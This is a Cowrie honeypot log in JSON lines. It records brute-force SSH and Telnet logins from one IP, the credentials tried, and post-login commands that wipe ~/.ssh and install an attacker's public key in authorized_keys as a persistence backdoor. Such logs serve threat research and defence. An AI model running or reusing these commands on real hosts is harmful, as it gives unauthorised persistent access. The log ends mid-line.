{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"2.3","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:03:12.341182Z","src_ip":"178.128.252.101","session":"3bad41800151"}
{"eventid":"cowrie.session.closed","duration":2.439131021499634,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:03:12.346442Z","src_ip":"178.128.252.101","session":"3bad41800151"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42008,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce5c0e0d3c68","protocol":"ssh","message":"New connection: 212.227.235.229:42008 (1.2.3.4:22) [session: ce5c0e0d3c68]","sensor":"my-vps","timestamp":"2025-08-26T13:03:17.164148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:03:17.164830Z","src_ip":"212.227.235.229","session":"ce5c0e0d3c68"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:03:17.420233Z","src_ip":"212.227.235.229","session":"ce5c0e0d3c68"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-26T13:03:18.483113Z","src_ip":"212.227.235.229","session":"ce5c0e0d3c68"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:03:19.740931Z","src_ip":"212.227.235.229","session":"ce5c0e0d3c68"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49568,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1b459f34037","protocol":"ssh","message":"New connection: 212.227.235.229:49568 (1.2.3.4:22) [session: e1b459f34037]","sensor":"my-vps","timestamp":"2025-08-26T13:03:44.973261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:03:44.974236Z","src_ip":"212.227.235.229","session":"e1b459f34037"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:03:45.219939Z","src_ip":"212.227.235.229","session":"e1b459f34037"}
{"eventid":"cowrie.login.failed","username":"syncuser","password":"syncuser","message":"login attempt [syncuser/syncuser] failed","sensor":"my-vps","timestamp":"2025-08-26T13:03:46.245479Z","src_ip":"212.227.235.229","session":"e1b459f34037"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:03:47.494056Z","src_ip":"212.227.235.229","session":"e1b459f34037"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39546,"dst_ip":"1.2.3.4","dst_port":23,"session":"3e237b1eabc4","protocol":"telnet","message":"New connection: 212.227.235.229:39546 (1.2.3.4:23) [session: 3e237b1eabc4]","sensor":"my-vps","timestamp":"2025-08-26T13:04:17.485409Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:04:17.677536Z","src_ip":"212.227.235.229","session":"3e237b1eabc4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:04:17.702091Z","src_ip":"212.227.235.229","session":"3e237b1eabc4"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T13:04:17.703566Z","src_ip":"212.227.235.229","session":"3e237b1eabc4"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T13:04:17.704532Z","src_ip":"212.227.235.229","session":"3e237b1eabc4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57938,"dst_ip":"1.2.3.4","dst_port":22,"session":"74dfae0f111c","protocol":"ssh","message":"New connection: 212.227.235.229:57938 (1.2.3.4:22) [session: 74dfae0f111c]","sensor":"my-vps","timestamp":"2025-08-26T13:04:54.017811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:04:54.018643Z","src_ip":"212.227.235.229","session":"74dfae0f111c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:04:54.263003Z","src_ip":"212.227.235.229","session":"74dfae0f111c"}
{"eventid":"cowrie.login.failed","username":"oss","password":"oss","message":"login attempt [oss/oss] failed","sensor":"my-vps","timestamp":"2025-08-26T13:04:55.282794Z","src_ip":"212.227.235.229","session":"74dfae0f111c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:04:56.532574Z","src_ip":"212.227.235.229","session":"74dfae0f111c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43430,"dst_ip":"1.2.3.4","dst_port":22,"session":"6095fe76d0fa","protocol":"ssh","message":"New connection: 212.227.235.229:43430 (1.2.3.4:22) [session: 6095fe76d0fa]","sensor":"my-vps","timestamp":"2025-08-26T13:05:01.805312Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:05:01.806627Z","src_ip":"212.227.235.229","session":"6095fe76d0fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:05:02.054002Z","src_ip":"212.227.235.229","session":"6095fe76d0fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41869,"dst_ip":"1.2.3.4","dst_port":22,"session":"80f9f72bf8af","protocol":"ssh","message":"New connection: 212.227.235.229:41869 (1.2.3.4:22) [session: 80f9f72bf8af]","sensor":"my-vps","timestamp":"2025-08-26T13:05:02.893198Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Administrator123","message":"login attempt [root/Administrator123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:05:03.066195Z","src_ip":"212.227.235.229","session":"6095fe76d0fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:05:03.609168Z","src_ip":"212.227.235.229","session":"6095fe76d0fa"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:05:03.609938Z","src_ip":"212.227.235.229","session":"6095fe76d0fa"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:05:03.611057Z","src_ip":"212.227.235.229","session":"6095fe76d0fa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:05:03.854943Z","src_ip":"212.227.235.229","session":"6095fe76d0fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:05:04.425485Z","src_ip":"212.227.235.229","session":"6095fe76d0fa"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:05:04.426401Z","src_ip":"212.227.235.229","session":"6095fe76d0fa"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:05:04.672174Z","src_ip":"212.227.235.229","session":"6095fe76d0fa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:05:04.673170Z","src_ip":"212.227.235.229","session":"6095fe76d0fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45802,"dst_ip":"1.2.3.4","dst_port":22,"session":"860f76428be0","protocol":"ssh","message":"New connection: 212.227.235.229:45802 (1.2.3.4:22) [session: 860f76428be0]","sensor":"my-vps","timestamp":"2025-08-26T13:05:04.919313Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:05:04.920148Z","src_ip":"212.227.235.229","session":"860f76428be0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:05:05.165606Z","src_ip":"212.227.235.229","session":"860f76428be0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:05:06.188874Z","src_ip":"212.227.235.229","session":"860f76428be0"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:05:07.438935Z","src_ip":"212.227.235.229","session":"860f76428be0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48006,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a417c3dca4e","protocol":"ssh","message":"New connection: 212.227.235.229:48006 (1.2.3.4:22) [session: 9a417c3dca4e]","sensor":"my-vps","timestamp":"2025-08-26T13:05:07.676183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:05:07.677270Z","src_ip":"212.227.235.229","session":"9a417c3dca4e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:05:07.917545Z","src_ip":"212.227.235.229","session":"9a417c3dca4e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:05:08.920067Z","src_ip":"212.227.235.229","session":"9a417c3dca4e"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:05:09.162279Z","src_ip":"212.227.235.229","session":"6095fe76d0fa"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:05:09.163303Z","src_ip":"212.227.235.229","session":"9a417c3dca4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56600,"dst_ip":"1.2.3.4","dst_port":22,"session":"470ecf62296e","protocol":"ssh","message":"New connection: 212.227.235.229:56600 (1.2.3.4:22) [session: 470ecf62296e]","sensor":"my-vps","timestamp":"2025-08-26T13:06:14.959681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:06:14.960481Z","src_ip":"212.227.235.229","session":"470ecf62296e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37270,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1d93ab9b34a","protocol":"ssh","message":"New connection: 212.227.235.229:37270 (1.2.3.4:22) [session: c1d93ab9b34a]","sensor":"my-vps","timestamp":"2025-08-26T13:06:15.328096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:06:15.328776Z","src_ip":"212.227.235.229","session":"c1d93ab9b34a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:06:15.574586Z","src_ip":"212.227.235.229","session":"c1d93ab9b34a"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc112233","message":"login attempt [root/Abc112233] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:06:16.594632Z","src_ip":"212.227.235.229","session":"c1d93ab9b34a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:06:17.102529Z","src_ip":"212.227.235.229","session":"c1d93ab9b34a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:06:17.103221Z","src_ip":"212.227.235.229","session":"c1d93ab9b34a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:06:17.104324Z","src_ip":"212.227.235.229","session":"c1d93ab9b34a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:06:17.352252Z","src_ip":"212.227.235.229","session":"c1d93ab9b34a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:06:17.957165Z","src_ip":"212.227.235.229","session":"c1d93ab9b34a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa 